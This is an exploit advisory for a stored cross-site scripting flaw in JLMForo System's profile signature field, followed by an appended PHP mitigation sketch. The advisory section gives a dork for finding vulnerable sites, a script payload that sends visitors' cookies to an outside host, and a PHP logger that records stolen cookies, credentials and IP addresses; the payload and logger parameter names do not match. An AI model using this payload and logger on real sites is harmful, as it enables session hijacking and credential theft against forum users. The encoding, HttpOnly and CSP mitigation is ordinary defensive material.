JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability

2007.12.16
Credit: JosS
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability
# Download:
# http://www.miscodigos.com/aplicaciones/JLMForo%20System/
# Bug found by Jose Luis Góngora Fernández / JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "Powered By JLMForo System"
# Stop lammer

# Explanation Basic :

1.- Register in the forum (registro.php)
2.- Put in your signature the XSS (modificarPerfil.php)
3.- Create a subject
4.- Wait for an answer to visualize the XSS

# To Rob Cookies:

1.- Register in the forum (registro.php)
2.- Put in your signature the XSS (modificarPerfil.php):

<script>window.location="http://yousite.com/xss.php?cookie="+document.cookie</script>

3.- Upload in your Site:

<?php
$archivo = fopen('log2.htm','a'); // Here we can change the name of the file to create
$cookie = $_GET['c'];
$usuario = $_GET['id'];
$ip = getenv ('REMOTE_ADDR');
$re = $HTTPREFERRER;
$fecha=date("j F, Y, g:i a");
fwrite($archivo, '<hr>USUARIO Y PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br> IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>');
fclose($archivo);
?>

4.- Chmod 777 archive
5.- Create a subject
6.- Wait for an answer to run the XSS

//---------------------------------------\

Greetz To: All Hackers
Jose Luis Góngora Fernández / JosS!
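
Mitigation sketch, added here as an example and not taken from JLMForo or from the advisory: the signature saved through modificarPerfil.php is HTML-encoded when it is rendered in a thread, and the session cookie is marked HttpOnly so that script in the page cannot read it through document.cookie. The function names, the "signature" CSS class, the HTTPS assumption and the sample input are all hypothetical, since the advisory does not show the forum's source.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers: JLMForo's real function and field names are not
// shown in the advisory, so these names are assumptions.

/** Encode an untrusted signature for output inside an HTML element. */
function render_signature(string $signature): string
{
    // ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces invalid
    // UTF-8 sequences instead of returning an empty string.
    $safe = htmlspecialchars($signature, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    // nl2br runs after encoding, so the only markup in the result is the
    // <br> tags it inserts for line breaks.
    return '<div class="signature">' . nl2br($safe) . '</div>';
}

/** Start the session with a cookie that page script cannot read. */
function start_hardened_session(): void
{
    session_set_cookie_params([
        'httponly' => true,  // not exposed through document.cookie
        'secure'   => true,  // assumes the forum is served over HTTPS
        'samesite' => 'Lax', // not sent on cross-site subrequests
    ]);
    session_start();
}

/** Defence in depth: refuse inline script even if encoding is missed somewhere. */
function send_security_headers(): void
{
    header("Content-Security-Policy: script-src 'self'");
    header('X-Content-Type-Options: nosniff');
}

// Constructed sample input: a signature containing a script element.
$stored = "<script>alert(document.cookie)</script>\nRegards, user";
echo render_signature($stored), PHP_EOL;
```

Encoding belongs at output time in every template that prints the signature; call start_hardened_session() and send_security_headers() before any output is sent.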

